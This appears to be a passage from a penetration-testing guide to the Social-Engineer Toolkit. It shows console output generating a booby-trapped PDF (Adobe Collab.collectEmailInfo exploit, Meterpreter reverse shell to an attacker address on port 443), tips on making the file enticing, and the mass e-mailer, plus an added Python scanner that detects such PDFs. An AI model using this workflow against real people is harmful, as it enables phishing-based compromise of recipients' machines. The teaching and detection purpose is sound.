
The Social-Engineer Toolkit


3. Windows Reverse VNC DLL                  Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)          Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)    Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)             Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS        Tunnel communication over HTTP using SSL and use Meterpreter.

Enter the payload you want (press enter for default):

[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.10.1.112:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.

As an added bonus, use the file-format creator in SET to create your attachment.
Right now the attachment will be imported with filename of 'template.whatever'
Do you want to rename the file?
example Enter the new filename: moo.pdf

 1. Keep the filename, I don't care.
 2. Rename the file, I want to be cool.

Enter your choice (enter for default): 1
Keeping the filename and moving on.

From the SET main menu, select Spear-Phishing Attack Vectors followed by Perform a Mass Email Attack. This attack infects a PDF file using the Adobe Collab.collectEmailInfo vulnerability, delivering a Metasploit Meterpreter reverse payload, which is the SET default. Collab.collectEmailInfo is a heap-based exploit that, if the file is opened (and if the target's version of Adobe Acrobat is vulnerable to this exploit), will connect back to the attacking workstation on port 443, a port that most networks allow outbound.

You are also given the option of renaming the malicious file to make it more enticing for the target to open. The default name (template.pdf) is kept in this scenario for demonstration purposes.
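From the receiving side, the indicators described above (a JavaScript action wired to run when the PDF opens, and a script calling Collab.collectEmailInfo) are what a mail gateway or triage script would look for. The scanner below is an added example, not code from the book or from SET; the build_sample helper constructs a minimal test PDF (not an exploit) and the detection handles FlateDecode-compressed streams and PDF name escapes such as /J#61vaScript, which are commonly used to defeat naive string matching.

```python
import re
import zlib

# PDF name escapes (/J#61vaScript == /JavaScript) are a common way to dodge naive grep.
_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"stream\r?\n(.*?)\nendstream", re.DOTALL)
_JS_ACTION = re.compile(rb"/(JavaScript|JS)\b")
_OPEN_TRIGGER = re.compile(rb"/(OpenAction|AA)\b")  # runs on open / additional actions

def _unescape_names(data: bytes) -> bytes:
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def _inflated_streams(data: bytes) -> bytes:
    """Concatenate the inflated body of every stream that zlib can decompress."""
    out = []
    for m in _STREAM.finditer(data):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # uncompressed or other filter: the raw bytes are scanned anyway
    return b"\n".join(out)

def scan_pdf(data: bytes) -> dict:
    """Return which indicators are present in a PDF given as bytes."""
    text = _unescape_names(data) + b"\n" + _inflated_streams(data)
    findings = {
        "javascript_action": _JS_ACTION.search(text) is not None,
        "runs_on_open": _OPEN_TRIGGER.search(text) is not None,
        "collab_collectEmailInfo": b"Collab.collectEmailInfo" in text,
    }
    findings["suspicious"] = findings["javascript_action"] and findings["collab_collectEmailInfo"]
    return findings

def build_sample(js: bytes, compress: bool = True) -> bytes:
    """Constructed minimal PDF for testing (not an exploit): /OpenAction -> JS stream."""
    body = zlib.compress(js) if compress else js
    filt = b"/Filter /FlateDecode " if compress else b""
    return (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /J#61vaScript /JS 3 0 R >> endobj\n"
            b"3 0 obj << " + filt + b"/Length " + str(len(body)).encode() + b" >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n%%EOF\n")

if __name__ == "__main__":
    # Constructed sample: the call name alone is enough to trip the rule.
    print(scan_pdf(build_sample(b"Collab.collectEmailInfo({});")))
```

A JavaScript action on its own is common in legitimate forms, so only the combination with the Collab.collectEmailInfo call is reported as suspicious; the open trigger is reported separately as context.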

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer: the first sends an e-mail to one individual, and the second lets you import a list and send to as many people as you want within that list.